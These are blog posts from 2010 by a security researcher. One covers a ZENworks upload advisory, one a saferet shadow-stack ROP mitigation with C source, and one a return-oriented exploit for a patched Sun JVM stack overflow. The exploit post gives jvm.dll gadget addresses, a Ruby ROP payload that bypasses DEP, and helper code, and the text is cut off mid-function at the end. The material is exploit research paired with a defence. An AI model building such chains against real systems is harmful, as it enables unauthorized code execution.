Tuesday, 27 April 2010

Novell ZENworks UploadServlet Remote Code Execution Vulnerability

TippingPoint's Zero Day Initiative (ZDI) have published an advisory for a remote, pre-authentication arbitrary file upload vulnerability in Novell ZENworks Configuration Management which leads to arbitrary code execution. This vulnerability was discovered by Stephen Fewer of Harmony Security.

You can read the full ZDI advisory here:

Friday, 16 April 2010

A little return oriented exploitation on Windows x86 (Part 2)

In part 1 of this blog post I showed a simple return oriented attack which used ROP to bypass permanent DEP and execute arbitrary code. This post will look at an experimental compiler convention (currently dubbed saferet) that aims to mitigate such return oriented attacks.

The technique is built around the well-known concept of a shadow stack, which maintains at run time a list of valid return addresses for each thread. The earliest use of a shadow stack I know of is Stack Shield by Vendicator (circa 2000), which mitigated stack based buffer overflows. More recent ROP specific mitigations include the Transparent Runtime Shadow Stack (TRUSS) by Saravanan Sinnadurai, Qin Zhao and Weng-Fai Wong (2008) and ROPdefender by Lucas Davi, Ahmad-Reza Sadeghi and Marcel Winandy (2010). Both TRUSS and ROPdefender combine a shadow stack with run time binary instrumentation to monitor the control flow of a thread. saferet differs from both: it is a compile time solution, and it relies on the exception handling features of the Windows OS to ensure the integrity of a thread's call stack.

saferet maintains a separate shadow stack for each thread of execution, recording both the return address and the current stack pointer. At compile time the prolog of every function is modified to call saferet_prolog(), which at run time overwrites the real return address on the stack with a cookie value. We also modify at compile time how a RET instruction is performed, as a return instruction is the most common way (albeit not the only way) to create gadgets for use in a ROP attack. By inserting a HLT instruction before every RET instruction (HLT is a privileged instruction and does not affect any EFLAGS), we ensure that an exception is generated before any attempt to return to an address on the stack. Remember that, because of saferet_prolog(), the actual return address is no longer present on the stack. An exception handler, saferet_handler(), then verifies at run time that the return address has not been modified and that the stack pointer is as expected, before allowing execution to continue and return to the expected return address previously recorded on the shadow stack.
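To make the bookkeeping concrete, here is a minimal, portable C model of the idea. It is not the saferet code itself (which appears later in this post): it assumes a simulated stack of 32-bit slots instead of the real thread stack, and the names sim_thread, sim_prolog() and sim_before_ret() are hypothetical. sim_prolog() plays the role of saferet_prolog(), and sim_before_ret() plays the role of saferet_handler() when the HLT in front of a RET traps.

```c
#include <stddef.h>
#include <stdint.h>

#define STACK_SLOTS 64   /* size of the simulated stack, in 32-bit slots */
#define MAX_RECORDS 16   /* fixed shadow-stack depth for this sketch */

/* One shadow-stack entry: the real return address and where it lived. */
typedef struct { uint32_t ret; size_t esp; } sim_record;

typedef struct {
    uint32_t stack[STACK_SLOTS];     /* simulated thread stack */
    sim_record records[MAX_RECORDS]; /* per-thread shadow stack */
    size_t index;                    /* next free record */
    uint32_t cookie;                 /* per-thread cookie value */
} sim_thread;

/* Like saferet_prolog(): save the return address held in stack[esp] on the
 * shadow stack, then overwrite it with the cookie. Returns 0 if full. */
int sim_prolog(sim_thread *t, size_t esp)
{
    if (t->index >= MAX_RECORDS || esp >= STACK_SLOTS)
        return 0;
    t->records[t->index].ret = t->stack[esp];
    t->records[t->index].esp = esp;
    t->index++;
    t->stack[esp] = t->cookie;
    return 1;
}

/* Like saferet_handler() on the HLT before a RET: the stack pointer must match
 * the newest record and its slot must still hold the cookie. On success the
 * real return address is restored and the record popped; 0 means violation. */
int sim_before_ret(sim_thread *t, size_t esp)
{
    if (t->index == 0)
        return 0;
    const sim_record *r = &t->records[t->index - 1];
    if (r->esp != esp || t->stack[r->esp] != t->cookie)
        return 0;
    t->stack[esp] = r->ret;
    t->index--;
    return 1;
}
```

A normal prolog/return pair gets its return address back, while overwriting the slot (a classic overflow) or reaching the RET with a different stack pointer (a stack pivot) is reported as a violation.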

Below is a simple function compiled first without and then with the saferet convention. The saferet version adds push esp and call saferet_prolog at the start of the function and a hlt immediately before the ret.

Without saferet:

push ebp
mov ebp, esp
mov eax, [ebp+8]
mov ecx, [ebp+12]
add eax, ecx
mov esp, ebp
pop ebp
ret

With saferet:

push esp
call saferet_prolog
push ebp
mov ebp, esp
mov eax, [ebp+8]
mov ecx, [ebp+12]
add eax, ecx
mov esp, ebp
pop ebp
hlt
ret

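For a function with a single return, the saferet convention adds 7 bytes: 1 byte for push esp, 5 bytes for call saferet_prolog (a CALL with a 32-bit relative displacement) and 1 byte for the hlt. The basic operation of the saferet convention is shown in the diagram below.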
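The 7-byte figure can be checked by emitting the added instructions by hand. The helpers below are hypothetical and are not part of the modified TCC. They use the standard x86 encodings 0x54 (push esp), 0xE8 followed by a 32-bit displacement measured from the end of the CALL (call rel32), and 0xF4 (hlt). A function with more than one RET would get one extra HLT byte per additional RET.

```c
#include <stddef.h>
#include <stdint.h>

/* Write the 6-byte saferet prolog (push esp; call target) into buf, assuming
 * buf will be loaded at address 'at'. Returns the number of bytes written. */
size_t emit_saferet_prolog(uint8_t *buf, uint32_t at, uint32_t target)
{
    uint32_t call_at = at + 1;             /* CALL follows the 1-byte PUSH ESP */
    uint32_t rel = target - (call_at + 5); /* rel32 is relative to the next instruction */
    buf[0] = 0x54;                         /* push esp */
    buf[1] = 0xE8;                         /* call rel32 */
    buf[2] = (uint8_t)(rel);               /* little-endian displacement */
    buf[3] = (uint8_t)(rel >> 8);
    buf[4] = (uint8_t)(rel >> 16);
    buf[5] = (uint8_t)(rel >> 24);
    return 6;
}

/* Write the 1-byte HLT that saferet places before each RET. */
size_t emit_saferet_epilog(uint8_t *buf)
{
    buf[0] = 0xF4;                         /* hlt */
    return 1;
}
```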

If saferet_handler detects a return violation, the process can be terminated. If no return violation is detected, saferet_handler restores the expected return address to the stack and allows execution to proceed to the intended return instruction. saferet_handler is registered through the Vectored Exception Handler mechanism in Windows, which provides a process wide exception filter and has a number of advantages over stack based Structured Exception Handlers. Specifically, Microsoft's /GS protection has a weakness: during a stack based buffer overflow, an attacker can gain EIP control via an overwritten Structured Exception Handler on the stack, even though the GS stack cookie has also been overwritten. saferet avoids this because Vectored Exception Handlers are processed before Structured Exception Handlers, so saferet_handler detects the return violation before the SEH chain on the stack is processed, even if the attacker triggers an access violation by writing past the end of the allocated stack memory. ROP attacks are mitigated by reducing the number of function tails that can be used as gadgets; however, ret2libc style attacks, which call a whole function rather than using gadgets, are not mitigated.
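The ordering argument can be illustrated with a toy dispatcher. This is a deliberately simplified model, not the real Windows exception dispatcher: the names dispatch, handler_fn and the verdict values are hypothetical, and a V_TERMINATE verdict stands in for saferet_handler() calling ExitProcess(). It shows that when a vectored handler ends the search, no handler from the (attacker-controllable) SEH chain ever runs.

```c
#include <stddef.h>

/* Verdicts a handler can give in this toy model. */
typedef enum { V_CONTINUE_SEARCH, V_CONTINUE_EXECUTION, V_TERMINATE } verdict;

/* A handler receives a hypothetical exception code. */
typedef verdict (*handler_fn)(int code);

/* Offer the exception to every vectored handler first, then walk the SEH
 * chain. Returns the position of the handler that ended the search (vectored
 * handlers are numbered first) or -1 if none did. *seh_ran counts how many
 * SEH handlers were actually invoked. */
int dispatch(const handler_fn *vectored, size_t nv,
             const handler_fn *seh, size_t ns, int code, size_t *seh_ran)
{
    *seh_ran = 0;
    for (size_t i = 0; i < nv; i++)
        if (vectored[i](code) != V_CONTINUE_SEARCH)
            return (int)i;
    for (size_t i = 0; i < ns; i++) {
        (*seh_ran)++;
        if (seh[i](code) != V_CONTINUE_SEARCH)
            return (int)(nv + i);
    }
    return -1;
}
```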

A number of caveats exist with this technique:

  • This is a compile time mitigation, so all code for a module must be recompiled to take advantage of it, unlike run time mitigations that use binary instrumentation.
  • The return instruction itself can still be used by an attacker in a ROP attack, as can the tail end of saferet_handler, because saferet_handler cannot protect itself (unlike saferet_prolog, which can).
  • Because an exception (technically two exceptions, see the source below) is generated for every call, there is a major performance hit from the transition into kernel mode needed to process each exception and pass control to our user mode exception handler. Some changes at the OS level could reduce this, for example a designated handler that only processes saferet exceptions and so avoids some of the overhead.

The implementation itself is relatively simple and consists of the two functions mentioned previously. A little more work is needed on the compiler side to support the saferet convention. As a proof of concept, I have modified the open source Tiny C Compiler (TCC) (written by Fabrice Bellard, licensed under the LGPL) to support saferet. The definitions of THREADINFO, RECORD, RECORDS and HALT_OPCODE are not shown here. The saferet_prolog() function is as follows:

/*
 * The global TLS index we use to make this all thread safe.
 * TLS_OUT_OF_INDEXES marks "not yet allocated", as 0 is a valid TLS index.
 */
DWORD tls = TLS_OUT_OF_INDEXES;

/*
 * The global heap we use for all SAFERET related allocations.
 */
HANDLE heap = NULL;

// saferet_prolog() registers saferet_handler(), which is defined further below.
LONG __declspec(__sr_handler__) saferet_handler( EXCEPTION_POINTERS * Exception );

/*
 * This is the function prolog which is used by the compiler for each function
 * to be protected with SAFERET.
 * __sr_prolog__ uses the __stdcall calling convention and places a HLT instruction
 * before all RET/RETN instructions; however, it does not insert a call to saferet_prolog,
 * as this would introduce a recursive loop. Instead we mimic the results of a
 * call to saferet_prolog from within saferet_prolog itself.
 */
VOID __declspec(__sr_prolog__) saferet_prolog( DWORD esp )
{
    register THREADINFO * thread;

    // for now just sanity check ESP has a value, but we should probably check this for a valid read/write address
    if( !esp )
        return;

    // if this is the first call to saferet_prolog in this process we allocate the TLS index
    if( tls == TLS_OUT_OF_INDEXES )
    {
        // get a TLS index to store each thread's THREADINFO structure
        tls = TlsAlloc();
        if( tls == TLS_OUT_OF_INDEXES )
            return;
        // if we don't have a process wide SAFERET heap yet, create one...
        if( !heap )
        {
            heap = HeapCreate( HEAP_GENERATE_EXCEPTIONS, 0, 0 );
            // and register the process wide vectored exception handler (1 = call it first)
            AddVectoredExceptionHandler( 1, &saferet_handler );
        }
    }

    // grab this thread's THREADINFO structure and if one doesn't exist create it
    thread = TlsGetValue( tls );
    if( !thread )
    {
        LARGE_INTEGER counter;

        QueryPerformanceCounter( &counter );

        // the THREADINFO header is followed by an initial block of RECORDS records
        thread = (THREADINFO *)HeapAlloc( heap, HEAP_GENERATE_EXCEPTIONS|HEAP_ZERO_MEMORY, sizeof(THREADINFO)+(sizeof(RECORD)*RECORDS) );

        thread->index = 0;
        thread->total = RECORDS;

        // set a simple cookie value for this thread.
        thread->cookie = GetTickCount() ^ GetCurrentProcessId() ^ GetCurrentThreadId() ^ counter.LowPart;

        // set this thread's THREADINFO structure with our tls index
        if( !TlsSetValue( tls, thread ) )
            return;
    }

    // push a new record into our record stack for the callee's caller
    thread->records[ thread->index ].ret = *(DWORD *)esp;
    thread->records[ thread->index++ ].esp = esp;
    // patch over the real return address with this thread's cookie
    *(DWORD *)esp = thread->cookie;

    // modify the ESP value to point to the return address for this call to saferet_prolog
    // (esp-4 holds the argument pushed by 'push esp', esp-8 the return address pushed by CALL)
    esp -= 8;

    // push a new record into our record stack for the call to saferet_prolog
    thread->records[ thread->index ].ret = *(DWORD *)esp;
    thread->records[ thread->index++ ].esp = esp;
    // patch over the real return address with this thread's cookie
    *(DWORD *)esp = thread->cookie;

    // if we need to we grow the record stack
    if( thread->index >= thread->total )
    {
        thread->total += RECORDS;
        thread = (THREADINFO *)HeapReAlloc( heap, HEAP_GENERATE_EXCEPTIONS|HEAP_ZERO_MEMORY, thread, sizeof(THREADINFO)+(sizeof(RECORD)*thread->total) );
        TlsSetValue( tls, thread );
    }
}
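saferet_prolog() stores two records per call and grows the array only after writing them, so it appears to rely on the THREADINFO layout leaving room for at least one record beyond total. The following portable sketch of the same record stack checks capacity before every write instead. It uses realloc() in place of HeapReAlloc() and keeps the records in a separately allocated array; record_t, record_stack_t and RECORDS_CHUNK are hypothetical names, not the definitions shipped with the modified TCC.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdlib.h>

#define RECORDS_CHUNK 4   /* growth step, standing in for RECORDS */

typedef struct { uint32_t ret; uint32_t esp; } record_t;

typedef struct {
    size_t index;        /* number of records in use */
    size_t total;        /* number of records allocated */
    uint32_t cookie;     /* per-thread cookie (unused by these helpers) */
    record_t *records;   /* separately allocated record array */
} record_stack_t;

/* Push one {ret, esp} record, growing by RECORDS_CHUNK first if the array is
 * full, so the write below is always in bounds. Returns 0 on allocation failure. */
int record_push(record_stack_t *s, uint32_t ret, uint32_t esp)
{
    if (s->index >= s->total) {
        size_t total = s->total + RECORDS_CHUNK;
        record_t *p = realloc(s->records, total * sizeof *p);
        if (!p)
            return 0;
        s->records = p;
        s->total = total;
    }
    s->records[s->index].ret = ret;
    s->records[s->index].esp = esp;
    s->index++;
    return 1;
}

/* Pop the newest record into *out; returns 0 if the stack is empty. */
int record_pop(record_stack_t *s, record_t *out)
{
    if (s->index == 0)
        return 0;
    *out = s->records[--s->index];
    return 1;
}
```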

And the saferet_handler() is as follows:

/*
 * This is the exception handler used by SAFERET to filter all exceptions raised by a process.
 * __sr_handler__ uses the __stdcall calling convention and is intended to be used by the
 * saferet_handler function. This function has to opt out of the saferet convention itself.
 */
LONG __declspec(__sr_handler__) saferet_handler( EXCEPTION_POINTERS * Exception )
{
    register THREADINFO * thread;
    register DWORD esp;

    // Get the info structure for this thread
    thread = TlsGetValue( tls );

    // A thread with no records (e.g. one that never called saferet_prolog) has nothing
    // for us to check, so let the remaining handlers process the exception.
    if( !thread || !thread->index )
        return EXCEPTION_CONTINUE_SEARCH;

    // Get the esp value for the last record
    esp = thread->records[ thread->index-1 ].esp;

    // Test if the cookie we wrote to the stack via saferet_prolog() is still present.
    // We do the test here (as opposed to solely during an exception from a HLT instruction)
    // as saferet_handler may be called during an access violation and not just upon a
    // desired HLT/RET. This lets us detect a return violation before passing control to a
    // structured exception handler which, as the SEH chain is also stored on the stack, may
    // have been overwritten, allowing the attacker to gain EIP control. As our handler is a
    // vectored exception handler, we are given the access violation to process before the
    // (potentially corrupted) SEH chain gets a chance to process it.
    if( *(DWORD *)(esp) != thread->cookie )
    {
        char message[1024];
        char program[MAX_PATH];
        GetModuleFileNameA( NULL, program, MAX_PATH );
        snprintf( message, 1024, "The return address 0x%08X located at 0x%08X does not match the cookie 0x%08X.\n\nThis process will be terminated.\n\nEIP:0x%08X, Exception:0x%08X, Process:%d, Thread:%d\nFile:%s\n", *(DWORD *)(esp), esp, thread->cookie, Exception->ContextRecord->Eip, Exception->ExceptionRecord->ExceptionCode, GetCurrentProcessId(), GetCurrentThreadId(), program );
        MessageBoxA( NULL, message, "Return Violation!", MB_OK|MB_ICONEXCLAMATION );
        ExitProcess( -1 );
    }

    // Check if we are processing an exception generated via a privileged instruction
    if( Exception->ExceptionRecord->ExceptionCode == EXCEPTION_PRIV_INSTRUCTION )
    {
        // And only process 'HLT' instructions (we could also check here
        // if the next instruction is indeed a RET or RETN instruction).
        if( *(BYTE *)(Exception->ContextRecord->Eip) == HALT_OPCODE )
        {
            // If we are returning to an address from a different ESP we can signal a return violation.
            // We will already have checked the cookie value (above) if ESP is correct.
            if( esp != Exception->ContextRecord->Esp )
            {
                char message[1024];
                char program[MAX_PATH];
                GetModuleFileNameA( NULL, program, MAX_PATH );
                snprintf( message, 1024, "The stack pointer 0x%08X does not match the expected stack pointer 0x%08X.\n\nThis process will be terminated.\n\nEIP:0x%08X, Exception:0x%08X, Process:%d, Thread:%d\nFile:%s\n", Exception->ContextRecord->Esp, esp, Exception->ContextRecord->Eip, Exception->ExceptionRecord->ExceptionCode, GetCurrentProcessId(), GetCurrentThreadId(), program );
                MessageBoxA( NULL, message, "Return Violation!", MB_OK|MB_ICONEXCLAMATION );
                ExitProcess( -1 );
            }

            // Patch in the real return address and pop it off the thread's record list
            *(DWORD *)(Exception->ContextRecord->Esp) = thread->records[ --thread->index ].ret;

            // Advance execution past the 'HLT' instruction
            Exception->ContextRecord->Eip += sizeof(BYTE);

            // Continue execution and allow the return to the real return address
            return EXCEPTION_CONTINUE_EXECUTION;
        }
    }

    // If we get here we allow the remaining vectored exception handlers to process this
    // exception (if any are present) before handing the exception off to be processed by the
    // thread's current SEH chain, finally ending with the unhandled exception filter.
    return EXCEPTION_CONTINUE_SEARCH;
}
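The checks in saferet_handler() can be restated as a pure function, which makes their order easy to test without raising real exceptions. This is a hypothetical restatement: sr_decide, sr_verdict and the parameter names are illustrative, and HLT_OPCODE is set to 0xF4, the x86 HLT encoding, because the HALT_OPCODE definition used above is not shown.

```c
#include <stdint.h>

#define HLT_OPCODE 0xF4   /* x86 HLT */

typedef enum {
    SR_PASS_ON,     /* not ours: EXCEPTION_CONTINUE_SEARCH */
    SR_RESUME,      /* restore return address, skip HLT, continue execution */
    SR_BAD_COOKIE,  /* the recorded return slot no longer holds the cookie */
    SR_BAD_ESP      /* HLT reached with an unexpected stack pointer */
} sr_verdict;

sr_verdict sr_decide(uint32_t slot_value, uint32_t cookie,
                     uint32_t recorded_esp, uint32_t context_esp,
                     int is_priv_instruction, uint8_t opcode_at_eip)
{
    /* Checked for every exception, including access violations. */
    if (slot_value != cookie)
        return SR_BAD_COOKIE;
    /* Only privileged-instruction faults on a HLT are ours to resume. */
    if (!is_priv_instruction || opcode_at_eip != HLT_OPCODE)
        return SR_PASS_ON;
    if (recorded_esp != context_esp)
        return SR_BAD_ESP;
    return SR_RESUME;
}
```

Putting the cookie test first is what lets an access violation raised by an overflow be caught even though it is not a HLT fault.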

The modified version of TCC can be downloaded here: tcc-0.9.25-saferet.zip. It includes several simple applications (namely 'hanoi.exe', 'overflow_test.exe' and 'overflow_seh.exe') that show saferet in action. The examples can be compiled with TCC using saferet via the -SR switch, e.g. "tcc -SR .\win32\examples\overflow_seh.c". If you want to rebuild TCC from source you will need to use MinGW.

Monday, 12 April 2010

A little return oriented exploitation on Windows x86 (Part 1)

This post will take a look at how Return Oriented Programming (ROP) can be used on x86 Windows to bypass DEP and gain arbitrary code execution. The example I will use is from an exploit I wrote last year for a stack based buffer overflow I found in the Sun Java Virtual Machine, which was recently patched and disclosed by TippingPoint's ZDI (ZDI-10-061). Part 2 of this blog post will look at an experimental compiler convention that aims to mitigate return oriented attacks such as the one presented here.

It should be noted that a ROP attack against the JVM is not strictly necessary, because the JVM employs an executable heap, which allows an attacker to circumvent DEP and ASLR through heap spraying with a high degree of reliability. However, it still makes for an interesting case study.

Getting Our Bearings
The cmm!readMabCurveData bug (which I won't be discussing specifically in this post) is a vanilla stack based buffer overflow vulnerability whereby we gain EIP control via an overwritten return address and control a large portion of data on the stack, pointed to by ESP. ESI will also be pointing near our shellcode buffer, which has been placed on the stack.

Assuming ASLR is in place, we need to locate the address of a suitable image (or images) in memory so that we can begin to create some gadgets. Conveniently, the JVM applies no relocation to most of its modules, so we can use static base addresses for most of the modules used. In other scenarios we would need to leverage an information leak, or similar, to first discover a suitable module's address in memory.

The Plan
We will execute the following pseudo C code via several gadgets in order to bypass DEP and execute shellcode:

// we start with a pointer that is near-ish our shellcode (held in ESI at the time we get control)
extern BYTE * pNonExecutableShellcode;
BYTE * pExecutableMemory;
// first we will modify this pointer to point into our shellcode buffer
pNonExecutableShellcode -= 8192;
// we will then proceed to allocate some read/write/executable memory...
pExecutableMemory = VirtualAlloc( 0, 0x4000, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
// and then copy our shellcode into this executable memory...
memmove( pExecutableMemory, pNonExecutableShellcode, 0x3000 );
// finally we can execute the shellcode...
((VOID (*)( VOID ))pExecutableMemory)();
In total it will take 11 steps, built from 10 distinct gadgets (step 7 reuses gadget 1), to perform the above.

The Gadgets
We pick the module jvm.dll (version 1.6.0_14 at the original time of writing) which has a fixed base address of 0x6D800000 and will not be relocated.

First we calculate a pointer to the shellcode on the stack...

// (1) when we first return we must remove 3 DWORDs from the stack (the previous stack frame's parameters, which were altered)
0x6D8011AC: add esp, 12
0x6D8011AF: ret

// (2) get in some needed registers...
// ESI = pointer to stack just below shellcode
0x6D8FF623: mov edx, esi // save ESI into EDX for later
0x6D8FF625: pop esi // (2.A) unused
0x6D8FF626: mov eax, ebx
0x6D8FF628: pop ebx // (2.B) unused
0x6D8FF629: pop ebp // (2.C) unused
0x6D8FF62A: retn 12

// (3) set ECX to the stack adjust size
0x6D81BDD7: pop ecx // (3.A) 0x00002000
0x6D81BDD8: ret

// (4) set EDI = address where we save the shellcode address
0x6D802A88: pop edi // (4.A) 0x6DA612CC
0x6D802A89: ret

// (5) sub EDX, ECX to point to the shellcode buffer...
// ECX = size: 8192
// EDX = pointer to stack below shellcode (around ESP)
// EDI = writeable address
0x6D97ED06: sub edx, ecx // calculate address of shellcode
0x6D97ED08: mov [edi], edx // save it for later
0x6D97ED0A: pop edi // (5.A) unused
0x6D97ED0B: pop esi // (5.B) unused
0x6D97ED0C: pop ebp // (5.C) unused
0x6D97ED0D: retn 12

Now we VirtualAlloc a RWX buffer...

// (6) we just call a whole function here, ret2libc style...
0x6D970A50: push ebp
0x6D970A51: mov ebp, esp
0x6D970A53: mov eax, [ebp+12] // (6.B) allocation size: 0x00004000
0x6D970A56: test eax, eax
0x6D970A58: jnz short 0x6D970A5E
0x6D970A5A: mov al, 1
0x6D970A5C: pop ebp
0x6D970A5D: retn
0x6D970A5E: push 0x40 // PAGE_EXECUTE_READWRITE
0x6D970A60: push 0x1000 // MEM_COMMIT
0x6D970A65: push eax
0x6D970A66: mov eax, [ebp+8] // (6.A) allocation address: 0x00000000
0x6D970A69: push eax
0x6D970A6A: call VirtualAlloc
0x6D970A70: test eax, eax
0x6D970A72: setnz al
0x6D970A75: pop ebp
0x6D970A76: ret

// (7) reuse gadget 1 to advance past the two arguments used for the function call in gadget 6 (plus one padding DWORD)
0x6D8011AC: add esp, 12
0x6D8011AF: ret
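One detail of gadget 6 is worth spelling out. The function does not return VirtualAlloc's pointer unchanged: it ends with test eax, eax / setnz al, which replaces only the low byte of EAX. A region allocated with a NULL address starts on an allocation granularity boundary, so that low byte is zero and EAX ends up as the allocation base plus 1. Gadgets 8, 10 and 11 carry this value through, which is why the memmove size in the call stack must be at most alloc_size - 1. The small C model below shows the arithmetic; the helper names and the example base address are hypothetical.

```c
#include <stdint.h>

/* EAX after gadget 6: 'setnz al' overwrites only the low byte of the
 * VirtualAlloc result with 1 (non-NULL) or 0 (NULL). */
uint32_t gadget6_eax(uint32_t virtualalloc_result)
{
    uint8_t al = virtualalloc_result != 0;            /* setnz al */
    return (virtualalloc_result & 0xFFFFFF00u) | al;  /* upper 24 bits kept */
}

/* Largest copy that still fits when the destination is EAX rather than the
 * true allocation base. */
uint32_t max_copy(uint32_t base, uint32_t alloc_size)
{
    uint32_t dest = gadget6_eax(base);
    return base + alloc_size - dest;
}
```

For a 64 KB aligned base such as 0x00A50000 and the 0x4000 byte allocation used here, EAX becomes 0x00A50001 and up to 0x3FFF bytes fit, so the 0x3000 byte memmove is safe.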

Now we memmove the shellcode into the new RWX buffer...

// (8) move the new RWX buffer EAX into ECX for the upcoming memmove...
0x6D824C7C: mov ecx, eax
0x6D824C7E: mov eax, [ecx+20]
0x6D824C81: add esp, 4
0x6D824C84: add eax, ecx
0x6D824C86: pop ebp
0x6D824C87: ret

// (9) set EAX to our shellcode buffer on stack, which we stored in gadget 5
0x6D808150: mov eax, dword ptr [0x6DA612CC]
0x6D808155: retn 8

// (10) perform the memmove, returning the destination buffer in EAX
// the memmove size amount is a param we have already placed on stack.
0x6D85A181: push eax // the source address (shellcode on stack)
0x6D85A182: push ecx // the destination address (new RWX buffer)
0x6D85A183: call memmove // memmove returns the dest address in EAX
0x6D85A189: add esp, 12
0x6D85A18C: pop ebp // (10.A) unused
0x6D85A18D: ret

Finally we can execute the shellcode...

// (11) EAX is the RWX shellcode buffer so jump into it...
0x6D96FA23: jmp eax

The Call Stack
Using the above we construct a call stack which includes the return addresses, parameters and padding bytes as shown below in Ruby:

# when we get EIP control we use this...
eip = [0x6D8011AC].pack('V') # (1) return to stack fix up

# prior to the stack fix up, ESP will point to this...
# (the first 3 dwords are parameters from the last function call)
rop = [0x00000000].pack('V') # null to avoid crashing
rop << [0xAAAAAAAA].pack('V') # unused
rop << [0x6DA612CC].pack('V') # writeable memory to avoid crashing
rop << [0x6D8FF623].pack('V') # (2) return to register load
rop << [0xAAAAAAAA].pack('V') # (2.A) ESI, unused
rop << [0xAAAAAAAA].pack('V') # (2.B) EBX, unused
rop << [0xAAAAAAAA].pack('V') # (2.C) EBP, unused
rop << [0x6D81BDD7].pack('V') # (3)
rop << [0xAAAAAAAA].pack('V') # unused
rop << [0xAAAAAAAA].pack('V') # unused
rop << [0xAAAAAAAA].pack('V') # unused
rop << [0x00002000].pack('V') # (3.A) ECX, subtract from EDX to point to shellcode
rop << [0x6D802A88].pack('V') # (4)
rop << [0x6DA612CC].pack('V') # (4.A) EDI, address to save shellcode pointer
rop << [0x6D97ED06].pack('V') # (5)
rop << [0xAAAAAAAA].pack('V') # (5.A) EDI, unused
rop << [0xAAAAAAAA].pack('V') # (5.B) ESI, unused
rop << [0xAAAAAAAA].pack('V') # (5.C) EBP, unused
rop << [0x6D970A50].pack('V') # (6)
rop << [0xAAAAAAAA].pack('V') # unused
rop << [0xAAAAAAAA].pack('V') # unused
rop << [0xAAAAAAAA].pack('V') # unused
rop << [0x6D8011AC].pack('V') # (7)
rop << [0x00000000].pack('V') # (6.A) null to alloc anywhere
rop << [0x00004000].pack('V') # (6.B) alloc_size
rop << [0xAAAAAAAA].pack('V') # unused
rop << [0x6D824C7C].pack('V') # (8)
rop << [0xAAAAAAAA].pack('V') # unused
rop << [0xAAAAAAAA].pack('V') # unused
rop << [0x6D808150].pack('V') # (9)
rop << [0x6D85A181].pack('V') # (10)
rop << [0xAAAAAAAA].pack('V') # unused
rop << [0xAAAAAAAA].pack('V') # unused
rop << [0x00003000].pack('V') # memmove size (<= alloc_size - 1)
rop << [0xAAAAAAAA].pack('V') # (10.A) unused
rop << [0x6D96FA23].pack('V') # (11) exec shellcode
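Getting the padding right is the error-prone part of building the call stack. The C sketch below walks the same 36 DWORDs and checks that each gadget's return lands on the next gadget address. The per-gadget numbers are taken from the disassembly above: pops counts DWORDs removed before the RET (pop, add esp, or for gadget 10 the net effect of two pushes, add esp, 12 and pop ebp), and imm counts DWORDs released by RETN imm16. It models only stack consumption, not register contents; walk_chain and gadget_t are hypothetical names.

```c
#include <stddef.h>
#include <stdint.h>

typedef struct { uint32_t addr; unsigned pops; unsigned imm; } gadget_t;

static const gadget_t gadgets[] = {
    { 0x6D8011AC, 3, 0 },  /* (1)/(7) add esp, 12 ; ret */
    { 0x6D8FF623, 3, 3 },  /* (2) three pops ; retn 12 */
    { 0x6D81BDD7, 1, 0 },  /* (3) pop ecx ; ret */
    { 0x6D802A88, 1, 0 },  /* (4) pop edi ; ret */
    { 0x6D97ED06, 3, 3 },  /* (5) three pops ; retn 12 */
    { 0x6D970A50, 0, 0 },  /* (6) whole function, stack balanced ; ret */
    { 0x6D824C7C, 2, 0 },  /* (8) add esp, 4 ; pop ebp ; ret */
    { 0x6D808150, 0, 2 },  /* (9) retn 8 */
    { 0x6D85A181, 2, 0 },  /* (10) net: consumes size + (10.A) ; ret */
};

#define EXEC_SHELLCODE 0x6D96FA23u   /* (11) jmp eax */

/* The 'rop' string from the Ruby listing, one DWORD per entry. */
static const uint32_t rop[] = {
    0x00000000, 0xAAAAAAAA, 0x6DA612CC, 0x6D8FF623, 0xAAAAAAAA, 0xAAAAAAAA,
    0xAAAAAAAA, 0x6D81BDD7, 0xAAAAAAAA, 0xAAAAAAAA, 0xAAAAAAAA, 0x00002000,
    0x6D802A88, 0x6DA612CC, 0x6D97ED06, 0xAAAAAAAA, 0xAAAAAAAA, 0xAAAAAAAA,
    0x6D970A50, 0xAAAAAAAA, 0xAAAAAAAA, 0xAAAAAAAA, 0x6D8011AC, 0x00000000,
    0x00004000, 0xAAAAAAAA, 0x6D824C7C, 0xAAAAAAAA, 0xAAAAAAAA, 0x6D808150,
    0x6D85A181, 0xAAAAAAAA, 0xAAAAAAAA, 0x00003000, 0xAAAAAAAA, 0x6D96FA23,
};

/* Returns the number of gadgets entered (including the final jmp eax), or -1
 * on an unknown address or overrun. *consumed receives the DWORDs used. */
int walk_chain(uint32_t first_eip, size_t *consumed)
{
    const size_t n = sizeof rop / sizeof rop[0];
    size_t esp = 0;            /* index into rop[], i.e. the modelled ESP */
    uint32_t eip = first_eip;  /* the overwritten return address */
    int steps = 0;

    while (eip != EXEC_SHELLCODE) {
        const gadget_t *g = NULL;
        for (size_t i = 0; i < sizeof gadgets / sizeof gadgets[0]; i++)
            if (gadgets[i].addr == eip)
                g = &gadgets[i];
        if (!g)
            return -1;
        steps++;
        esp += g->pops;        /* pops / add esp before the RET */
        if (esp >= n)
            return -1;
        eip = rop[esp++];      /* RET pops the next gadget address */
        esp += g->imm;         /* RETN imm16 releases extra DWORDs */
    }
    *consumed = esp;
    return steps + 1;          /* count the final jmp eax */
}
```

Starting from the value in eip (0x6D8011AC), the walk visits all 11 steps and consumes exactly the 36 DWORDs of the call stack, which is a quick sanity check that no padding is missing or extra.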

In this particular example, exploitation would have been harder had the /GS compiler switch been used (assuming Visual Studio is being used for compilation), as we would not have been able to gain initial EIP control via the overwritten return address. However, due to a limitation in the /GS protection, we would still be able to get EIP control via an overwritten structured exception handler. Had /DYNAMICBASE been employed for jvm.dll (and all other modules loaded in the target process), we would not be able to rely on the static addresses used above. Instead, we would need to determine the base address of jvm.dll at run time before constructing the ROP call stack.
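As a rough sketch of that last step, assume the base address of jvm.dll has already been leaked. Each gadget keeps its offset from the image base, so the chain can be rebased by subtracting the fixed base 0x6D800000 and adding the real one. rebase and rebase_chain are hypothetical helpers, image_size stands in for the module's real size (not given in this post), and treating the writable address 0x6DA612CC as part of jvm.dll is an assumption.

```c
#include <stddef.h>
#include <stdint.h>

#define PREFERRED_BASE 0x6D800000u   /* jvm.dll's fixed base from this post */

/* Move one address from the preferred base to the actual base. */
uint32_t rebase(uint32_t addr, uint32_t actual_base)
{
    return addr - PREFERRED_BASE + actual_base;
}

/* Rebase every entry that falls inside [PREFERRED_BASE, PREFERRED_BASE +
 * image_size); padding and small constants are left untouched. */
void rebase_chain(uint32_t *chain, size_t n, uint32_t image_size,
                  uint32_t actual_base)
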